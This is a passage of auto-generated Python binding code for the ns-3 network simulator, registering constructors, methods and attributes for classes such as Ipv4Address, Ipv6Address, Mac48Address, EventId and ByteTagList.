## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function]
cls.add_method('GetStart',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3ByteTagList_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor]
cls.add_constructor([])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function]
cls.add_method('Add',
'ns3::TagBuffer',
[param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function]
cls.add_method('Add',
'void',
[param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t adjustment, int32_t appendOffset) [member function]
cls.add_method('AddAtEnd',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t adjustment, int32_t prependOffset) [member function]
cls.add_method('AddAtStart',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function]
cls.add_method('Begin',
'ns3::ByteTagList::Iterator',
[param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')],
is_const=True)
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function]
cls.add_method('GetOffsetStart',
'uint32_t',
[],
is_const=True)
## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagList::Iterator::Item',
[])
return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor]
cls.add_constructor([param('ns3::TagBuffer', 'buf')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable]
cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable]
cls.add_instance_attribute('end', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable]
cls.add_instance_attribute('size', 'uint32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable]
cls.add_instance_attribute('start', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3EventId_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_comparison_operator('==')
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventId const &', 'arg0')])
## event-id.h (module 'core'): ns3::EventId::EventId() [constructor]
cls.add_constructor([])
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')])
## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function]
cls.add_method('GetTs',
'uint64_t',
[],
is_const=True)
## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function]
cls.add_method('IsExpired',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function]
cls.add_method('IsRunning',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function]
cls.add_method('PeekEventImpl',
'ns3::EventImpl *',
[],
is_const=True)
return
def register_Ns3Ipv4Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor]
cls.add_constructor([param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('CombineMask',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv4Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv4Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('GetSubnetDirectedBroadcast',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Address const &', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function]
cls.add_method('IsLocalMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('IsSubnetDirectedBroadcast',
'bool',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
return
def register_Ns3Ipv4InterfaceAddress_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress() [constructor]
cls.add_constructor([])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4Address local, ns3::Ipv4Mask mask) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'local'), param('ns3::Ipv4Mask', 'mask')])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4InterfaceAddress const & o) [copy constructor]
cls.add_constructor([param('ns3::Ipv4InterfaceAddress const &', 'o')])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetLocal() const [member function]
cls.add_method('GetLocal',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Mask ns3::Ipv4InterfaceAddress::GetMask() const [member function]
cls.add_method('GetMask',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e ns3::Ipv4InterfaceAddress::GetScope() const [member function]
cls.add_method('GetScope',
'ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): bool ns3::Ipv4InterfaceAddress::IsSecondary() const [member function]
cls.add_method('IsSecondary',
'bool',
[],
is_const=True)
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetBroadcast(ns3::Ipv4Address broadcast) [member function]
cls.add_method('SetBroadcast',
'void',
[param('ns3::Ipv4Address', 'broadcast')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetLocal(ns3::Ipv4Address local) [member function]
cls.add_method('SetLocal',
'void',
[param('ns3::Ipv4Address', 'local')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetMask(ns3::Ipv4Mask mask) [member function]
cls.add_method('SetMask',
'void',
[param('ns3::Ipv4Mask', 'mask')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetPrimary() [member function]
cls.add_method('SetPrimary',
'void',
[])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetScope(ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
cls.add_method('SetScope',
'void',
[param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')])
## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetSecondary() [member function]
cls.add_method('SetSecondary',
'void',
[])
return
def register_Ns3Ipv4Mask_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor]
cls.add_constructor([param('uint32_t', 'mask')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor]
cls.add_constructor([param('char const *', 'mask')])
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function]
cls.add_method('GetInverse',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint16_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Mask', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'mask')])
return
def register_Ns3Ipv6Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor]
cls.add_constructor([param('uint8_t *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function]
cls.add_method('CombinePrefix',
'ns3::Ipv6Address',
[param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv6Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv6Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function]
cls.add_method('GetAllHostsMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function]
cls.add_method('GetAllNodesMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function]
cls.add_method('GetAllRoutersMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function]
cls.add_method('IsAllHostsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function]
cls.add_method('IsAllNodesMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function]
cls.add_method('IsAllRoutersMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function]
cls.add_method('IsAny',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Address const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function]
cls.add_method('IsLinkLocal',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function]
cls.add_method('IsLocalhost',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function]
cls.add_method('IsSolicitedMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function]
cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function]
cls.add_method('MakeSolicitedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv6Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function]
cls.add_method('Set',
'void',
[param('uint8_t *', 'address')])
return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor]
cls.add_constructor([param('uint8_t *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor]
cls.add_constructor([param('char const *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor]
cls.add_constructor([param('uint8_t', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint8_t',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Prefix const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
return
def register_Ns3Mac48Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(ns3::Mac48Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48Address const &', 'arg0')])
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(char const * str) [constructor]
cls.add_constructor([param('char const *', 'str')])
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::Allocate() [member function]
cls.add_method('Allocate',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Mac48Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyFrom(uint8_t const * buffer) [member function]
cls.add_method('CopyFrom',
'void',
[param('uint8_t const *', 'buffer')])
## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'void',
[param('uint8_t *', 'buffer')],
is_const=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv4Address address) [member function]
cls.add_method('GetMulticast',
'ns3::Mac48Address',
[param('ns3::Ipv4Address', 'address')],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv6Address address) [member function]
cls.add_method('GetMulticast',
'ns3::Mac48Address',
[param('ns3::Ipv6Address', 'address')],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast6Prefix() [member function]
cls.add_method('GetMulticast6Prefix',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticastPrefix() [member function]
cls.add_method('GetMulticastPrefix',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsGroup() const [member function]
cls.add_method('IsGroup',
'bool',
[],
is_const=True)
## mac48-address.h (module 'network'): static bool ns3::Mac48Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
